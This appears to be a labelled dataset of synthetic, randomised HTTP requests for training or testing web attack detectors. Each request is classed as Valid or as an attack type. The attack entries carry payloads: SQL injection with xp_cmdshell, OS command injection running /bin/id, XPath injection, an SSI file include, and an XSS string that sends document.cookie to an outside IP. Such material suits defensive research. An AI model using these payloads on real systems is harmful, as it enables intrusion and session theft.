Start - Id: 41035
class: SqlInjection
GET /F2dNLjxGDtE9A5/9Pdrophtacces53YAnq/kqUL7mg/ofusFg7fersh/y5jqIv/ehQb/Llogvwindow.openE.sh?group byD4iV58=%7Ctk%7Con&L0dfJhttpsPBQQ=1brWfglrejcxhesci5&Ttwnevf=exec+++++xp_cmdshell+++++%27%22tipcit7ha%22++%3E%3E+script.vbs%27&tntcwztwfgtu=snntessmaah&O7b0dvabthbd=emeld HTTP/1.0
Host: www.nih7l.net
Connection: keep-alive
Accept: application/postscript, application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 206.200.164.185
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="1"
Date: Wed, 15 Jul 09 14:35:34 GMT
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: a1tlic@rsdn.ch
If-Modified-Since: Mon, 17 Apr 06 16:05:47 CET
If-Unmodified-Since: Wed, 21 Jan 04 24:20:37 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 18
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 956-40926
Referer: http://enioazzh.st/r0g7Lr/teyue.pl
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/6.6 (Windows; U; Win98 1.5; he-sr; rv:4.2.9) Gecko/92815234
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6152x736
Via: 5.4 184.145.90.35
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 151 www.aseNtTKn.shtml "wntnn1nnvnehztTtrwO" "Fri, 15 Dec 06 03:39:44 GMT"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41035
Start - Id: 28133
class: Valid
GET /fSHydmSrnM8sS@euZY24/l043p3L6./gB1T3leo/nt09/eQeP/sru1lc9daceatiaEd/tCg6Z/rkbeEqyUd2hgocNf.php3?tjotsei4=aQu8c0nB&ye2sdcssrnat=%7C%3FoiioOqp&.iTlibvL=ebsrdbEcnloa&iusieenu=k+y&nfhlhaiee2=8833&brhTefrwe=65hR&w2aoatota=55C&GhXltWTcVF3=306610253&nf=N%5C+%27ietgvarwA+ut&hehDn=49&WeDaNbhfqeutari=09073771 HTTP/1.1
Host: www.jTaowe.net
Connection: niRvet
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 183.104.243.127
Cookie: neot=e>eEhttpbodyo;qtueOc4msseean=<eubelbcc~6lRoeval~ihome
Cookie2: $Version="590"
Date: Wed, 03 Feb 10 09:23:36 GMT
ETag: W/"0MdDX5NCZc@L9oK"
Expect: 100-continue
From: EcseaglP@o4oECcb.st
If-Modified-Since: Wed, 02 May 07 04:13:13 CET
If-Unmodified-Since: Thu, 27 Mar 08 14:14:58 UTC
If-Match: *
If-None-Match: *
If-Range: "15jkWPIx22WMQP2FUzP"
Max-Forwards: 1983
MIME-Version: 2.2
Pragma: nkoLpNoh='ebNctelp'
Proxy-Authorization: Digest username="0wng"
Authorization: NTLM dHRyaHllbHJwMW91dHNub2JhaGhub3R0c3NvekVhb1VjdG5hbW9zdGVvcmFhZXl1
Range: -76,-9033,4589-7
Referer: http://www.nujC.net/s9ln/piimeqri/fhn7szso/4ld7/Etahiim0.html
TE: chunked;q=0.5,gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/3.3 (Windows; U; WinNT 5.7; rg-16; rv:6.6.2) Gecko/74977862
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4261x691
Via: 7.5 141.34.68.58:1
Transfer-Encoding: gzip
Upgrade: oItf/8.6, mhoe/0.7, site7t/5.3, roNirm/8.5, mhoe1e/8.4
Warning: 821 169.183.205.45 "uorwsi4qi" "Sun, 12 Mar 06 21:00:13 UTC"
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 9260606100019
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28133
Start - Id: 42561
class: SqlInjection
GET /btmpO7grAsXrcpFRnetcatJ.tiff?hf4BhtloU=+Tc8brchildlroae+M&u8rhbo=cSeb6&gmtrburzabieden=%27+++++OR++++%27%27+++%3D+%27&ftpxB9HUQ=09547&Fn=x4ydet+%24di&sreac=enull&Dcw8=zxWPkUqU&uModdojyet=rgroup+byoS&amd=utnoak7cce9dnsN&ct=sis+u+ndtOwtee%26C&atan=tBsFzr0M&ima1=82386 HTTP/1.1
Host: 90.216.213.104
Connection: keep-alive
Accept: image/*, video/mpeg
Accept-Charset: x-mac-greek;q=0.8, koi8;q=0.8, x-mac-chinesesimp, gb2312
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=2262
Client-ip: 116.96.81.244
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="79"
Date: Tue, 15 Jul 08 20:32:04 UTC
ETag: "TraGuu_QjplOnZR"
Expect: shrot
From: spods@kyeiscew.net
If-Modified-Since: Mon, 13 Dec 04 21:13:29 CET
If-Unmodified-Since: Fri, 20 Jul 07 07:24:16 CET
If-Match: *
If-None-Match: "_KbjtWBMwwQAIu-xBqA"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 6101
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: NTLM Y2FuYXJuZkZuZTJlcmVoaW40WHV0ZVN0dHNzZGQzN3pP
Range: -05,8037-,228664-
Referer: /IChn/noLr/rpdpas/tueeknla.mdb
TE: trailers
Trailer: Expect
User-Agent: iaoUnhsm/1.4
UA-CPU: MIPS
UA-Disp: 1891,2562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 161x8196
Via: 1.4 www.6snf.jpeg, HTTP/3.6 www.shqtda.htm
Transfer-Encoding: compress
Upgrade: idlsll/7.2
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42561
Start - Id: 23274
class: Valid
GET /adtceiaa/Am98J75script6LLq/wlc@Mo2b2cqzZSVt4/oSanNcOjqpVLaST.aspx?jsgeaiocghsn=176626229&ad=ljfl75bF&taesc=s+insertehy&tbuLwithe4i=a%28cd HTTP/1.1
Host: 55.159.40.49:649
Connection: keep-alive
Accept: text/*
Accept-Charset: utf-8, x-mac-icelandic, big5;q=0.0, iso-8859-5
Accept-Encoding: 
Accept-Language: uB-ciostGrr;q=0.9
Cache-Control: qTtoeejw='Ctu6eoet'
Client-ip: 181.44.84.160
Cookie: oAo7r=74675;K7@libjS6xrmY=2883795;rShesnoiaam=Jehhv t~wz5;redroat8Ho=412155
Cookie2: $Version="74"
Date: Mon, 27 Jun 05 10:38:40 CET
ETag: "2@ut8TgWDk520dACYX5"
Expect: 100-continue
From: seuezp8x@tfEa7ie.uk
If-Modified-Since: Thu, 20 Aug 09 02:59:36 UTC
If-Unmodified-Since: Thu, 02 Aug 07 02:40:55 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Mar 06 11:18:08 GMT
Max-Forwards: 6400
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="5tlS"
Authorization: ozKu yOiIwN9J=dieiidro
Range: 46049-,984-,955-52588
Referer: /Wncri9/aemt/rinea.txt
TE: chunked,chunked,chunked;q=0.7
Trailer: User-Agent
User-Agent: iDinm/9.9.3.5.8
UA-CPU: MIPS
UA-Disp: 5075,682,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 030x0444
Via: 5.6 www.Vhrdh.htm
Transfer-Encoding: ised; abxueaa=wpcahnm
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 55.67.110.255
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23274
Start - Id: 36813
class: OsCommanding
GET /i4BvI/de005uyintbQdahwseea/CXWvKUwobjectLY@/aybex3vvvawignitscfl/1tdaheQce5xwanoiitj/lthne7ely2xdrcry3qnh.css?cdtBad5=%5C%3B%5C%2Fbin%5C%2Fid+++%3B&Vaccess_logscriptEWeHe8.=ls0vmbisaaatw HTTP/1.1
Host: www.bw4rawnA.uk
Connection: close
Accept: application/*, audio/*, text/*;q=0.2
Accept-Charset: windows-1258;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 167.61.38.24
Cookie: oajB=i78sPVBW
Cookie2: $Version="089"
Date: Thu, 16 Sep 04 08:11:00 UTC
ETag: W/"Jckp2N-T3XmAODG1S"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Tue, 13 Jan 09 19:21:41 UTC
If-Unmodified-Since: Tue, 08 Mar 05 02:05:43 GMT
If-Match: *
If-None-Match: "XIxQYM2qutBnAPN"
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 02
MIME-Version: 2.5
Pragma: en=h
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic YWdzcW51OlRldXNpZGc=
Range: -9,0-,-53
Referer: http://www.4ernT.uk/ar9i4i/aSd1in7/merAg/iftanar/khuor.mpg
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: tif0C17e0 http://www.hE7os.biz
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 8261x3395
Via: 4.4 www.eoatezc.gif:16570
Transfer-Encoding: identity
Upgrade: diz/2.5, oaahpo/0.7
Warning: 158 www.0rmm.html "ya0trItDfsofel" 
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36813
Start - Id: 913
class: Valid
GET /kF3iBX/zlV/h2ZeRoq/l6VOe-O.asp?ie=rrQ&osm=lud&5ecsetuslMpw=0085&taraIhrte=l&DCvbscriptzyw=985478&es=837965&elL6beia1in=hkppe&eiasobeep=5401883&tirc=t2S4vtjb&noorofs=3131&ttc6shivTbn4=Gskfeeho HTTP/1.1
Host: 11.232.130.154:80
Connection: keep-alive
Accept: image/png, application/zip
Accept-Charset: x-mac-icelandic;q=0.5, iso-8859-9, utf-8;q=0.8, x-mac-arabic
Accept-Encoding: 
Accept-Language: OAga-lznus2o, sug-d, ohehIiXo-xt7lLhb;q=0.1, omlo-aay
Cache-Control: no-store
Client-ip: 54.128.13.195
Cookie: ssEftoa1sf1ax=lochttpeJ7 9scripte0ycopyl>dmibody;Ieoxomoefne4hn=ie;eRnieemeygni1r=hhtanvhnir;gyShguTihae=o@f;mexjelehshdroe=7;4vl6es.51I=?iicle
Cookie2: $Version="57"
Date: Fri, 05 Jan 07 04:34:21 UTC
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: 100-continue
From: 3sntq@jnenrb.uk
If-Modified-Since: Mon, 24 Oct 05 09:39:51 UTC
If-Unmodified-Since: Wed, 02 Sep 09 01:16:55 GMT
If-Match: *
If-None-Match: "iRdYS0NmnZokpzCzzT"
If-Range: Sun, 04 Apr 04 09:32:42 UTC
Max-Forwards: 4456
MIME-Version: 3.0
Pragma: p7hi='felyn'
Proxy-Authorization: NTLM b2FuczVhaHBsbno1RXJldWV0NXd0UnJzaWJ1cGtvZW5kb21TZWFFVHNzVA==
Authorization: Basic UnRldDpyaXIzRTM=
Range: -13537,-702298,1-
Referer: http://ft1shgei.uk/ele8zcm.php
TE: chunked;q=0.9,deflate;q=0.8
Trailer: If-Match
User-Agent: adt9ea2j (cg.@TC@.b; rNMF8OB; 6WMMUE)
UA-CPU: PowerPC
UA-Disp: 1003,145,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1573x8135
Via: 6.6 www.gruSfyAf.jpeg:5, 3.9 www.sjhajt.js
Transfer-Encoding: compress
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 510626783025324042
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 913
Start - Id: 35778
class: XPathInjection
GET /rt1a/aNpqmNtjqzaxSbXd.js?ne1lie=eT%24or3qn-scriptgo&nytdgNgit=gvh%2FSAe%2Fo%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D50%5D+++%7C+++kn%2Fhh%2Fig1%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D64%5D+or+++++%273bex%27%3D++%27&1ra=37437&nchvk8hebay=316903 HTTP/1.0
Host: www.N7ja.st
Connection: keep-alive
Accept: image/*
Accept-Charset: x-mac-roman;q=0.7, windows-1255, macintosh
Accept-Encoding: gzip;q=0.4, compress;q=0.9, compress;q=0.0, identity;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 76.216.98.195
Cookie: 0s=if
Cookie2: $Version="11"
Date: Sat, 13 Jan 07 06:04:20 UTC
ETag: "pvdGNDdpuHTzisFAi5g_"
Expect: 100-continue
From: Nginnon@eatp.net
If-Modified-Since: Tue, 03 Mar 09 17:49:43 CET
If-Unmodified-Since: Tue, 16 Jun 09 18:19:17 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Oct 04 01:43:36 GMT
Max-Forwards: 09
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: NTLM U2xMYXdwaXJhdHJtY29ycmxvRTJMeXRkZWg3ZW10aGVlYWVrb2hp
Range: -777
Referer: http://www.tt7s.fr/zcrh.pdf
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: oowshGiysosehond
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 072x540
Via: gthae/6.9 www.ht4el1.tiff, 7.1 16.141.132.144
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 76346
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35778
Start - Id: 19559
class: Valid
GET /61ThrenTeZnpomtehie/1fvo4e/ieaoyNa/3arRn7whtrrenrojrR3.gif?n5TNkAjnwT=e0+8dsr199slocation&eet=lre&ii3nior6doj=c4AYH5e4%40%403&sNIcceprocessing-instruction=63772&igtfthjnFPsaut7=ygtW3&tifoseigGn=tlibf&Om7leRdtn8De=hKyANg_0.L.&in=yohttps3s%25wt&B-YSpofVprocessing-instruction=63&sznsmoEd6i=6346&emstot3=28&0Ald_90=eTOIbR48XUXP&jRS89UEoIR6=5tfsIetkeoirp&UqalmEasrxth=cc%278o HTTP/1.0
Host: www.ietc5tahb.be:7703
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rs-ew;q=0.3, 3ctr-tto, nh-upeecdiN, 8eebsIEm-do0iAll0
Cache-Control: max-stale
Client-ip: 158.64.174.242
Cookie: vs=Sl
Cookie2: $Version="0"
Date: Sun, 22 Jul 07 07:43:57 CET
ETag: W/"3WZi10qeyblryt3aQ"
Expect: emeCt
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 20 Sep 07 06:09:31 GMT
If-Unmodified-Since: Fri, 30 Jun 06 04:56:39 UTC
If-Match: "Bcycf8LOfSFW.MKg"
If-None-Match: "vkm5QlLRIxSOfUS"
If-Range: "5tbzeARibE4sTEQFSXL5"
Max-Forwards: 40
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic ZnpUYVNvcmU6dGFpY3B0
Authorization: NTLM ZWphZWNvZXR2ZXJlbzNVc2JoaHVpbDBlYWFPdGl5ZHlzNHFv
Range: 187147-0990,76-,-590377
Referer: /5yFl/nhureos/6scgoenl/ofdtluA.doc
TE: gzip,gzip;q=0.9,trailers
Trailer: Date
User-Agent: drs2oia (1@4lQeXO; e2pLvxhJs; a1j.7m; e@S2e-Dcgs)
UA-CPU: MIPS
UA-Disp: 3027,9526,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 690x0416
Via: 2.1 246.214.176.226, FTP/2.6 www.nnRau.html, FTP/4.7 178.153.110.117
Transfer-Encoding: deflate
Upgrade: blY3i/9.6
Warning: 422 www.otqstT.tiff "oinoowteRnso" 
X-Forwarded-For: 194.75.244.233
X-Serial-Number: 49554913
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19559
Start - Id: 12154
class: Valid
GET /aeaetnwloyhleaueae.jsp?.VQkvk@Z8Ir=5665500&9pao4coornicp=neohweEoAtprha&letSsa8nsnb8r=uT93spRQetC&pxorudDeek=383526&e95nup=ohe&3mn8Rconnect=575747&ieloqyn0bceE=9145&PZinEnMxewBna=7R6&ioc=SeAatidatrtr7%5D6e&adY3rn=wfWN&fshutdownWtZ63B=Ensyd3etont3Sjat&mdpswEa6eS7ht=45719&brt1saetiaygx12=uN%29&dlisslrynoayE=fihbcP&x@NIj=49807706 HTTP/1.0
Host: 119.170.154.82
Connection: 4utlz
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.2, identity, gzip, compress;q=0.7
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 110.164.174.247
Cookie: e2piah=0408;tgou2eS7sohsrHz=mEns1sDrawnteaem
Cookie2: $Version="2"
Date: Tue, 03 Feb 04 03:32:53 GMT
ETag: "5H7alzZE59rb@bbzAAA8"
Expect: iua6o=sshe;Gant
From: 3llueiuh@dwE6ieEe.uk
If-Modified-Since: Tue, 18 Jul 06 14:56:03 GMT
If-Unmodified-Since: Fri, 18 Apr 08 05:43:44 UTC
If-Match: *
If-None-Match: "mBOItQh1mNz_qz6cyZr"
If-Range: Wed, 06 Jun 07 10:38:06 CET
Max-Forwards: 6861
MIME-Version: 3.2
Pragma: i='tMr'
Proxy-Authorization: Digest nc=6E59aab8
Authorization: uazb jrwi=Iyfrm
Range: 334793-5273,194-
Referer: http://ssgnz.net/elxrt.wmn
TE: gzip,gzip,trailers
Trailer: Pragma
User-Agent: a8anhy (iM6szi9LS; 0IsJR4)
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5894x857
Via: 3.1 227.87.69.177, 4.6 www.Ehs1nch.jpeg
Transfer-Encoding: Msfebr
Upgrade: necoeD/4.9
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12154
Start - Id: 21542
class: Valid
GET /tre/KBjinsertbdocumentVw1/Q1NqLconnectPdDEo3ktmp/yrahdpKaft6ttc2Au/3nuNfipsao/uEeWGF/ntNgiAe5dn.mspx?apu8HttmdleTree=727&uinixtseo=eiti%29&tmo=9kaz&ssfwd=ege6O%29olilRao&QnGVdJ=binst&0MOFSjAe=484&R1a1agxd=4865990&tewHcdyx=3-&uxAnEWoEZ=78&lo=r7irts&ldocumentshutdownWY9rfYx=405&aTv0cs29yD=Oran&eeih4ik=nnp1VvIabsYL HTTP/1.0
Host: 193.21.39.171
Connection: keep-alive
Accept: text/*
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: 0t='nzls'
Client-ip: 145.238.161.146
Cookie: unhrcgesdnoamo=qtealikeconnectlordD&q;vtx2teSt=kL9;iez=1020;inputYSdSK.9j=0dh;cmkfm4tmEcbt8mo=666;iu1becof=rxq3asdqlce1xt
Cookie2: $Version="2"
Date: Thu, 23 Feb 06 21:32:45 GMT
ETag: W/"WTrMFwae4lFvrtp87"
Expect: gbwyar=satiq;eyeth
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Wed, 05 Apr 06 23:40:18 UTC
If-Unmodified-Since: Tue, 25 Mar 08 18:21:00 GMT
If-Match: *
If-None-Match: *
If-Range: "DNsWhDXFr8mF_Xb"
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM YnQ4bmh5OGg0dFFybG5kcjVnYWVldHVjaXdlY25lbGF0
Authorization: Basic ZDNvNWV1eHQ6Z285dA==
Range: 2514-,-4567,968-760
Referer: /chvnt/hywen5.png
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.8 (compatible; dUaaatno; Win98; egiSw)
UA-CPU: StrongARM
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0542x2765
Via: FTP/8.2 www.dauteL.png:4
Transfer-Encoding: compress
Upgrade: dmh/1.5, elpleh/2.3, bhbR/2.5, axes/9.3
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 42015
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21542
Start - Id: 40564
class: SSI
GET /iB7mJVM8f8HEHhxh4Ajg/nRhw@UhH2/1nX0aDCeJ7/ydstReoLhc/EyBJjyYcatWtmpACr1/g5MNjEj/ig.php?rml=hb6RIv9fU&WV4qdRUDrZ=67828810&child6mOr=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&gk3nqroee6=toKtHfTz73B7&8jeh3mc=57786052&y5e=oY1ikHNOOn0o&xQiySbeeteRti=81080&hoTlAoionhdsn=aud HTTP/1.0
Host: www.htouy.com
Connection: close
Accept: application/*;q=0.2, application/x-tar;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: compress, compress;q=0.1, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 65.35.166.11
Cookie: snavpdklhsemMl=eaAposition;oeioawktrr=te3o2r7ssnedt;ie7=1163514;6hFvwL1rotiOt6T=riesWiqt7sfs8hThm
Cookie2: $Version="29"
Date: Sun, 26 Jun 05 18:22:15 CET
ETag: "Mi8IDS@hpBaV6Zqy0"
Expect: Dmgzlepg=aTdpeoAa;8eizrast=eadti
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Fri, 07 May 04 11:44:39 GMT
If-Unmodified-Since: Wed, 14 Jan 04 02:35:13 GMT
If-Match: *
If-None-Match: "hZipGUw1Hlf3lHMr8yC"
If-Range: *
Max-Forwards: 055
Pragma: A='o'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Basic Umtha2E6dWxhZWF1UzE=
Range: 488078-9765
Referer: /sr0aj/joayeb3i/m5hiE/cf5mao1i/lil5ey.js
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/8.6 (X11; U; Open BSD i586 5.8; ew-sh; rv:9.4.0) Gecko/26330119
UA-CPU: PowerPC
UA-Disp: 5809,4725,8
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 6.7 186.126.110.155, 3.0 204.172.153.35
Transfer-Encoding: gzip
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40564
Start - Id: 49087
class: XPathInjection
GET /rPXc@aN.xDVtu55obFx/sb1UxMZh8PTHhmqxzRNO/Tb0issdlonee2pte/sI/lnx9ootiAtrruhVfrlga/eyo2Edo8H1vlKq/hgIwIyTIb/M0dJnOGkh15S/pR7OKvFoxKlxB6/aeezsnta0/rosBiReiThtsn.shtml?st=6960&goypvi=832&nSt6Crc3on=na%5Di%27fag%295btie&igreprsnqs=ttua7openj&OIws1hbaetteia=oD8ClDZ8Neml&oee=9493284&roBncTroeOs5i=tie&tstsoEornea=so%40a+&yBZLC=464&ihfto4=0485081&seh39=00189++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++0537%3D&xtgail2h=ho%2F%29ormgautoexecolo%2Bap HTTP/1.0
Host: www.nDYfTy.net
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-9;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: r=ksr4Ase6
Client-ip: 111.104.86.65
Cookie: aa=7u9>rt%trct;oo;n0Nues6pioa=vOluc/node];rewht=65152;lmaot0iia2=oqn~
Cookie2: $Version="2"
Date: Mon, 09 Feb 09 24:45:36 UTC
ETag: "dsvjXwgkhsjkzNeQ.NI"
Expect: uotniqud=2tuam1Po;Hd2ei
From: eynba@e3yzoc.com
If-Modified-Since: Fri, 16 Feb 07 09:36:27 CET
If-Unmodified-Since: Wed, 19 Sep 07 08:41:47 CET
If-Match: *
If-None-Match: *
If-Range: "d0f0VF0rTPq0r9j5lP"
Max-Forwards: 5
MIME-Version: 4.7
Pragma: 2o='iteabt'
Proxy-Authorization: Basic ZXRhdGVzbGE6Mm9UdElh
Authorization: NTLM dENuaWx3ZWRoZGF0ZXB1ZWVzT2MzQXRtdTlka3ZtVHBkZWU0YWxvYWV5YXNpdmVz
Range: -21
Referer: http://inyst.fr/rssnnuAe/zgntDi/lalsmed/Scionen.dll
TE: trailers,trailers,gzip;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 5.6; es-cL; rv:0.8.6) Gecko/25913874
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 7.6 www.goib.tiff
Transfer-Encoding: compress
Upgrade: 5yOeb/5.2, csz/2.8, soyn/4.8, ngtnf/9.9
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49087
Start - Id: 47633
class: XSS
GET /evdvbVc/bHtewwrnoPte9iattN1/ti7n5_HPrJvJQw4nRv/pedeElerzh.dll?utaexfemfp=oQu&reDneseil=%3Cimg+++dynsrc+%3D++%22++++javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F165.126.163.152%2Fanit.jsp%27%2Bdocument.cookie%29%3B%5D++%22+%3E&snyengiflnlnt7S=siifttgirr+ HTTP/1.0
Host: 158.59.209.5
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-cyrillic, cp-950, iso-8859-4, utf-7;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=1310
Client-ip: 208.225.246.243
Cookie: HBQWyIBJQ=4724736;ws=u5w5xqW4X;H_httpsSncg.z=6QrXb;oeHitrinooo=ncu9Iuodo;dniEp7khdeyir=lNSG8f_;gcRnyeiq0oreega=hazwtdt1xiu
Cookie2: $Version="5"
Date: Wed, 30 Jun 04 24:52:32 GMT
ETag: W/"vCJ4ze41NxoBsap4"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Thu, 01 Mar 07 05:50:37 CET
If-Unmodified-Since: Wed, 09 Jan 08 05:09:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8183
MIME-Version: 5.8
Pragma: stu='my'
Proxy-Authorization: NTLM cmF0YUUybGlvcmNSTGNjZDk2ZWhhcWpldG85bzFhZWV0YWttdGxvcg==
Authorization: Basic ZTV0V2ZudGI6YmFoeXBkdHQ=
Range: 51-,059585-
Referer: http://sCni.fr/r7Ebt/ao1r/dz09ca/nened.mdb
TE: trailers,deflate;q=0.3,trailers
Trailer: Warning
User-Agent: Mozilla/8.5 (X11; U; Linux i586 7.4; R9-my; rv:0.0.5) Gecko/01948904
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: 4.8 www.oamhaaui.gif:83817
Transfer-Encoding: gzip
Upgrade: euleee/5.6, eNo/6.5, estIph/1.3
Warning: 544 147.190.206.64 "e6Olrstooilettn" 
X-Forwarded-For: 111.147.190.89
X-Serial-Number: 6943669939
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47633
Start - Id: 28421
class: Valid
